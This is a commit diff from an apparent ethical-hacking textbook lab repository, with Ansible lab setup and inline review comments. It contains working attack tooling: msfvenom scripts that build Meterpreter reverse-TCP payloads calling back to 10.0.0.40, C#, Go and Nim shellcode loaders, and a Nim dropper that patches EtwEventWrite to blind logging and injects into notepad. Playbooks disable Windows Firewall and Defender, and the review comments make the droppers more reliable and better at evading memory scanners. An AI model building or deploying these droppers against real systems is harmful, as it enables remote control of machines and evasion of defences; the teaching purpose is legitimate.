Merge branch 'main' of github.com:GrayHatHacking/GHHv6
ergot86 committed Oct 12, 2021
2 parents f2cdf55 + 95f874a commit 9e24544
Showing 52 changed files with 1,358 additions and 0 deletions.
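--- /dev/null
+++ b/ch07/Lab/ansible/ansible.cfg
@@ -0,0 +1,4 @@
+[defaults]
+host_key_checking = False
+enable_task_debugger = True
+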
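Review bot: `host_key_checking = False` on the second line switches off SSH host-key verification for every host this inventory reaches, so a spoofed Kali or jump host would be accepted silently; that is a defensible trade for a throwaway lab, but it should be labelled as such rather than left as an unexplained default. I would add `# Lab only: skips SSH host-key verification for freshly built VMs; do not reuse this config outside the lab` above it. `enable_task_debugger = True` drops into an interactive debugger whenever a task fails, which will stall unattended runs, so a one-line comment saying it is intentional for student troubleshooting would help too.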
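--- /dev/null
+++ b/ch07/Lab/ansible/ch07_playbook.yml
@@ -0,0 +1,25 @@
+---
+- hosts: dc
+roles:
+- common
+- windows_dns_server
+- windows_domain_controller
+- windows_domain_users_groups
+vars_files:
+- vars/vars.yml
+- vars/users.yml
+- hosts: target
+gather_facts: yes
+roles:
+- common
+- windows_client_join_domain
+- target_customizations
+vars_files:
+- vars/vars.yml
+- hosts: kali
+become: yes
+roles:
+- kali_customizations
+vars_files:
+- vars/vars.yml
+- vars/users.yml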
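--- /dev/null
+++ b/ch07/Lab/ansible/roles/common/defaults/main.yml
@@ -0,0 +1,2 @@
+---
+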
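--- /dev/null
+++ b/ch07/Lab/ansible/roles/common/handlers/main.yml
@@ -0,0 +1 @@
+---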
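--- /dev/null
+++ b/ch07/Lab/ansible/roles/common/meta/main.yml
@@ -0,0 +1,16 @@
+---
+galaxy_info:
+role_name: install_misc_software
+author: Russ Nolen rnolen@splunk.com
+description: Install some basic software
+license: BSD
+min_ansible_version: 2.4
+platforms:
+- name: Windows
+versions:
+- 2012R2
+- Win10
+galaxy_tags:
+- system
+- security
+dependencies: []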
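Review bot: `role_name: install_misc_software` and `description: Install some basic software` do not describe this role — it lives at `roles/common`, and its tasks/main.yml in this same commit disables the Windows firewall and Defender real-time protection before it installs anything — so anyone reading the galaxy metadata underestimates its blast radius. I would change them to `role_name: common` and `description: Lab baseline - disables Windows Firewall and Defender real-time protection, then installs Chocolatey packages`. Keeping the metadata honest matters more than usual here because the role is tagged `security` and could be picked up from Galaxy by name.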
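--- /dev/null
+++ b/ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml
@@ -0,0 +1,7 @@
+---
+- name: Install Chocolately via Powershell
+win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex
+"
+- name: Install notepadplusplus
+win_chocolatey:
+name: notepadplusplus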
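Review bot: The first task fetches `https://chocolatey.org/install.ps1` and pipes it straight into `iex` under `Set-ExecutionPolicy Bypass`, so every lab box executes whatever that URL serves at run time with no pinning, checksum or signature check — the same unpinned-remote-script pattern the course material warns about, and nothing in the file says it is a deliberate lab shortcut. The `win_chocolatey` module used by the second task bootstraps Chocolatey itself when it is missing (as far as I recall; confirm for the Ansible version in use), so the `win_shell` task can likely be dropped; if the script is kept, fetch it with `win_get_url` plus a `checksum` and run the saved copy instead. At minimum add `# Lab only: executes an unpinned remote script via iex` above the task and pin the package with `version:` so rebuilds are reproducible.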
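--- /dev/null
+++ b/ch07/Lab/ansible/roles/common/tasks/main.yml
@@ -0,0 +1,9 @@
+---
+# need to wrap an if statement around this one
+# make it windows specific
+- name : Disable Windows Firewall
+win_firewall:
+state: disabled
+- include: windows-disable-defender.yml
+when: ansible_distribution is search ('Microsoft')
+- include: chocolatey-components.yml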
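Review bot: The `Disable Windows Firewall` task carries no `when:` guard even though the two comments above it ask for exactly that, while the `windows-disable-defender.yml` include right after it does get `ansible_distribution is search('Microsoft')`; the role is only applied to the `dc` and `target` plays today so nothing breaks, but the guard belongs on the task itself: `when: ansible_distribution is search('Microsoft')`, after which the two TODO comments can go. `include:` has been deprecated in favour of `include_tasks:`/`import_tasks:` since Ansible 2.4 — the minimum this role's meta declares — so `- include_tasks: windows-disable-defender.yml` avoids the deprecation warning. Note also that `windows-components.yml`, added in this same commit, is never included from here, so the VC++ redistributable is not installed by this role unless something outside it pulls that file in.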
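--- /dev/null
+++ b/ch07/Lab/ansible/roles/common/tasks/windows-components.yml
@@ -0,0 +1,6 @@
+---
+- name: Install the Visual C++ Redistributable
+win_package:
+path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe"
+product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}'
+arguments: /install /passive /norestart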
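Review bot: `win_package` is handed an `https://` URL directly, so the installer is downloaded and executed on every target with no integrity check — `win_package` has no checksum option, and `product_id` only tells Ansible whether the package is already present, it does not verify what was fetched. Splitting it into a `win_get_url` download with a pinned `checksum` followed by a `win_package` install of the local file closes that gap at the cost of a few lines; the hash should be taken from the installer you validated for the lab image. This file is also not included from tasks/main.yml in this commit, so the task never runs as things stand — worth either wiring it in or noting at the top why it is kept.
```yaml
- name: Download the Visual C++ Redistributable
  win_get_url:
    url: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe"
    dest: "C:\\Windows\\Temp\\vc_redist.x64.exe"
    checksum: "<sha256 of the validated installer>"
    checksum_algorithm: sha256
- name: Install the Visual C++ Redistributable
  win_package:
    path: "C:\\Windows\\Temp\\vc_redist.x64.exe"
    product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}'
    arguments: /install /passive /norestart
```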
@@ -0,0 +1,8 @@
---

- name: Disable Windows Defender
win_regedit:
key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
value: DisableRealTimeMonitoring
datatype: dword
data: 1
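Review bot: Writing `DisableRealTimeMonitoring = 1` under the Defender policy key only switches off real-time scanning — scheduled scans, cloud-delivered protection and attack-surface rules remain active — and on Windows 10 images with Tamper Protection enabled Defender may ignore this policy value altogether, so students could still see the droppers from this commit quarantined; that should be verified against the target image and stated in the file. I would add a header comment: `# Lab only: turns off Defender real-time monitoring via policy; has no effect while Tamper Protection is on, so disable that in the image first.` Because the only guard is the `when:` on the include in tasks/main.yml, the task runs against whatever host includes it, so repeating the `ansible_distribution` guard on the task itself would make the file safe to reuse.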
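--- /dev/null
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt
@@ -0,0 +1,8 @@
+[ghh]
+comment = GHH Share
+browseable = yes
+path = /tmp
+printable = no
+guest ok = yes
+read only = yes
+create mask = 0700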
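Review bot: The `[ghh]` share exports `/tmp` to anyone (`guest ok = yes`, no `hosts allow`), and the three build scripts in this commit write their compiled droppers to `/tmp`, so every payload — and anything else any user on the Kali box drops into `/tmp` — is readable by any host that can reach port 445 on it. Point the share at a dedicated directory and restrict the source range, e.g. `path = /srv/ghh` and `hosts allow = 10.0.0.0/24` (the lab subnet suggested by `LHOST=10.0.0.40` in the scripts — confirm), and have the build scripts copy only the finished binaries there. `create mask = 0700` has no effect on a `read only = yes` share and can be dropped.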
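--- /dev/null
+++ b/ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch
@@ -0,0 +1,10 @@
+--- /usr/share/kaboxer/covenant.kaboxer.orig 2021-09-12 19:28:35.392506176 +0000
++++ /usr/share/kaboxer/covenant.kaboxer.yaml 2021-09-12 18:54:26.224293412 +0000
+@@ -26,6 +26,7 @@
+publish_ports:
+- 7443
+- 443
++ - 80
+before_run_script: |
+#!/bin/sh
+set -e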
@@ -0,0 +1,17 @@
#!/bin/bash

SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`

# Replae relevant lines
SC=${SC/buf/shellcode}

PRE=`grep -B 1000 INJECT csharp.template | grep -v INJECT`
POST=`grep -A 1000 INJECT csharp.template | grep -v INJECT`

# Format the output
echo "$PRE" > csharp.cs
echo "$SC" >> csharp.cs
echo "$POST" >> csharp.cs

mcs csharp.cs -out:/tmp/csharp_dropper64.exe
chmod 755 /tmp/csharp_dropper64.exe
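Review bot: Nothing checks that `msfvenom` on the third line produced anything — there is no `set -e`, and a command substitution would not trip it anyway — so an empty `$SC` silently yields a `csharp.cs` with no `shellcode` array and `mcs` fails with a compiler error far from the real cause. Add `set -euo pipefail` after the shebang and `[ -n "$SC" ] || { echo "msfvenom produced no output" >&2; exit 1; }` after the substitution. The `grep -B 1000`/`-A 1000` split also silently truncates the template if it ever exceeds 1000 lines on either side of `INJECT`; `sed '/INJECT/q'` style splitting, or `awk` on the marker, has no such limit. `LHOST=10.0.0.40` is hard-coded in all three build scripts; `LHOST="${LHOST:-10.0.0.40}"` keeps the lab default while letting a rebuilt lab override it, and `Replae` in the comment is a typo for `Replace`.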
@@ -0,0 +1,10 @@
#!/bin/bash

SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.40`
CODE=`cat go.template`
# Replae relevant lines
CODE=${CODE/INJECT/$SC}
echo "$CODE" > createFiber.go

GOOS=windows GOARCH=amd64 go build -o /tmp/CreateFiber.exe createFiber.go
chmod 755 /tmp/CreateFiber.exe
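Review bot: As in the C# build script, an `msfvenom` failure on the third line leaves `$SC` empty and `INJECT` is replaced with nothing, so `createFiber.go` still compiles but the resulting binary base64-decodes a zero-length slice and panics on `shellcode[0]` at run time — the worst place to find out. Guard it with `set -euo pipefail` and `[ -n "$SC" ] || { echo "msfvenom produced no output" >&2; exit 1; }` before the template is written. `LHOST="${LHOST:-10.0.0.40}"` instead of the hard-coded address, as for the other two scripts, would let the lab be rebuilt on a different subnet without editing every script.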
@@ -0,0 +1,19 @@
#!/bin/bash

SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`

# Replae relevant lines
ORIG="byte[] buf = new byte["
FIX="var shellcode: array["
SC=${SC/$ORIG/$FIX}
SC=${SC/]/,byte] = }
SC=${SC/\}/]}
SC=${SC/{/\[ byte }
SC=${SC/;/}
SC=${SC/\[ \[/\[}
SC=${SC//[$'\n']}
CODE=`cat nim.template`
CODE=${CODE/INJECTHERE/$SC}
echo "$CODE" > dropper.nim

nim c -d=mingw -b=cpp --passL="-static-libgcc -static-libstdc++" --app=console --cpu=amd64 --out=/tmp/nim_dropper64.exe dropper.nim
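Review bot: The seven `${SC/...}` substitutions rewrite msfvenom's C# array into a Nim `array[N, byte]` literal by replacing only the first `]`, `}`, `{` and `;`, so the result is correct only while `-f csharp` keeps emitting exactly `byte[] buf = new byte[N] {...};`; any change in that layout produces a malformed literal that surfaces as a confusing `nim c` error. Asking msfvenom for a bare comma-separated hex list (e.g. `-f num`, verify the exact output) and having `nim.template` wrap it in `[byte ...]` removes the rewrite entirely. As with the other scripts, add `set -euo pipefail`, abort when `$SC` is empty, and read `LHOST` from the environment rather than hard-coding `10.0.0.40`.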
@@ -0,0 +1,45 @@
using System;
using System.Runtime.InteropServices;


namespace GHHSCLauncher
{
class Program
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE = 0x10;

[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32")]
static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);

[DllImport("kernel32")]
private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );

[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds);

static void Main()
{
INJECT


UInt32 scAddress = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(scAddress), shellcode.Length);
uint prot;
VirtualProtect((IntPtr)(scAddress), shellcode.Length, PAGE_EXECUTE, out prot);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;


hThread = CreateThread(0, 0, scAddress, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}

}
}
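Review bot: The P/Invoke declarations for `VirtualAlloc` and `CreateThread` type every pointer-sized value (`lpStartAddr`, the return address, `lpThreadAttributes`, `lpStartAddress`) as `UInt32`, yet the build script generates an x64 payload and `mcs` builds AnyCPU, so this runs as a 64-bit process where `VirtualAlloc` can return an address above 4 GB; marshalling that into a `UInt32` truncates it, and `Marshal.Copy`/`CreateThread` then use the wrong address. Declaring them as `IntPtr`/`UIntPtr` makes the launcher correct on both bitnesses; the `VirtualAlloc` and `VirtualProtect` return values are also never checked, so a failed allocation goes straight into `Marshal.Copy`. The `INJECT` marker expands to msfvenom's `byte[] shellcode = ...` declaration (see the C# build script), so the signature changes below are the only edits needed.
```csharp
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

// … unchanged: VirtualProtect and WaitForSingleObject declarations, start of Main …

IntPtr scAddress = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
if (scAddress == IntPtr.Zero)
{
    return; // allocation failed; nothing to copy into
}
Marshal.Copy(shellcode, 0, scAddress, shellcode.Length);
uint prot;
if (!VirtualProtect(scAddress, shellcode.Length, PAGE_EXECUTE, out prot))
{
    return; // could not make the region executable
}
// … unchanged: thread variables …
hThread = CreateThread(IntPtr.Zero, UIntPtr.Zero, scAddress, pinfo, 0, ref threadId);
```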
@@ -0,0 +1,94 @@
import winim/lean
import strformat
import dynlib
import osproc

const patch: array[1, byte] = [byte 0xc3]

proc Patchntdll(): bool =
var
ntdll: LibHandle
cs: pointer
op: DWORD
t: DWORD
disabled: bool = false

ntdll = loadLib("ntdll")
if isNil(ntdll):
echo "[X] Failed to load ntdll.dll"
return disabled

cs = ntdll.symAddr("EtwEventWrite") # equivalent of GetProcAddress()
if isNil(cs):
echo "[X] Failed to get the address of 'EtwEventWrite'"
return disabled

if VirtualProtect(cs, patch.len, 0x40, addr op):
echo "[*] Applying patch"
copyMem(cs, unsafeAddr patch, patch.len)
VirtualProtect(cs, patch.len, op, addr t)
disabled = true

return disabled


proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =

# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
let tProcess = startProcess("notepad.exe")
tProcess.suspend() # That's handy!
defer: tProcess.close()

echo "[*] Target Process: ", tProcess.processID

let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
defer: CloseHandle(pHandle)

echo "[*] pHandle: ", pHandle

let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)

var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)

echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""

let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
defer: CloseHandle(tHandle)

echo "[*] tHandle: ", tHandle
echo "[+] Injected"

INJECTHERE

# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
var success = Patchntdll()
echo fmt"[*] ETW blocked by patch: {bool(success)}"
injectCreateRemoteThread(shellcode)
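Review bot: `injectCreateRemoteThread` never checks the three values it depends on — `pHandle` from `OpenProcess`, `rPtr` from `VirtualAllocEx` and `tHandle` from `CreateRemoteThread` can all be null, yet each is used unconditionally, the `defer: CloseHandle(...)` is registered before any check could run, and the proc prints `[+] Injected` whatever happened. Add a guard after each call, e.g. `if isNil(rPtr): echo "[X] VirtualAllocEx failed: ", GetLastError(); return`, and the equivalents for `pHandle` and `tHandle` (compare against winim's null handle value). The region is allocated `PAGE_EXECUTE_READ_WRITE`; allocating it read/write, writing, then switching to execute/read with `VirtualProtectEx` avoids the private RWX mapping that memory scanners key on. `Patchntdll` overwrites the start of `EtwEventWrite` with a bare `ret`, so the patched function returns whatever happens to be in RAX — a caller that checks the status may treat it as an error, which deserves a comment if it is accepted.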
@@ -0,0 +1,5 @@
module createFiber.go

go 1.15

require golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect
@@ -0,0 +1,2 @@
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY=
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
@@ -0,0 +1,87 @@
// Inspired by ired.team and Ne0nd0g's go-shellcode repository
// Reference: https://github.com/Ne0nd0g/go-shellcode
// Reference: https://ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber


package main

// import modules we'll need. We will need unsafe and the windows libraries to be able to
// launch shellcode. The winddows library let's us use DLLs and unsafe bypasses go
// restrictions around casting so that we can execute code

import (
"encoding/base64"
"fmt"
"unsafe"
"golang.org/x/sys/windows"
)

// Constants that we will need
const (
_MEM_COMMIT = 0x1000
_MEM_RESERVE = 0x2000
_PAGE_RWX = 0x40
)

func main() {


// shellcode in base64
sc := "INJECT"

shellcode, err := base64.StdEncoding.DecodeString(sc)
if err != nil {
fmt.Sprintf("Base64 Decoding Error: %s", err.Error())
return
}

// Load dlls
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
ntdll := windows.NewLazySystemDLL("ntdll.dll")

// memory creation/copy routines
VirtualAlloc := kernel32.NewProc("VirtualAlloc")
RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")

// Fiber creation routines
ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber")
CreateFiber := kernel32.NewProc("CreateFiber")
SwitchToFiber := kernel32.NewProc("SwitchToFiber")

// Only fibers can scedule fibers, so this convers the main thread into a fiber
_, _, err = ConvertThreadToFiber.Call()

if err != nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("ConvertThreadToFiber Failed: %s", err.Error())
return
}

// Create memory for our shellcode
addr, _, err:= VirtualAlloc.Call(0, uintptr(len(shellcode)), _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX)

if ((err != nil && err.Error() != "The operation completed successfully.") || addr == 0) {
fmt.Sprintf("VirtualAlloc Failed:%s", err.Error())
return
}

// Copy shellcode to our newly created memory
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))

if err != nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("RtlCopyMemory Failed:%s", err.Error())
return
}

// Create Fiber to execute shellcode
fiber, _, err:= CreateFiber.Call(0, addr, 0)

if err!= nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("CreateFiber Failed:%s", err.Error())
return
}

// Switch to Fiber
SwitchToFiber.Call(fiber)


}
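Review bot: Every error path in `main` calls `fmt.Sprintf` and discards the result, so none of the `... Failed:` messages are ever printed and the program just exits silently — `go vet` reports this as an unused result. Replace each with `fmt.Printf("VirtualAlloc Failed: %s\n", err.Error())` (and likewise for the base64, `ConvertThreadToFiber`, `RtlCopyMemory` and `CreateFiber` branches). The `err != nil && err.Error() != "The operation completed successfully."` checks depend on the English text of `ERROR_SUCCESS`: `Call` always returns a non-nil `syscall.Errno`, so `err != nil` is always true and the string compare is the only thing preventing a false failure — compare against the constant instead, `if err != windows.ERROR_SUCCESS {`. `&shellcode[0]` on the `RtlCopyMemory` line also panics if the decoded payload is empty, so add `if len(shellcode) == 0 { return }` after the decode.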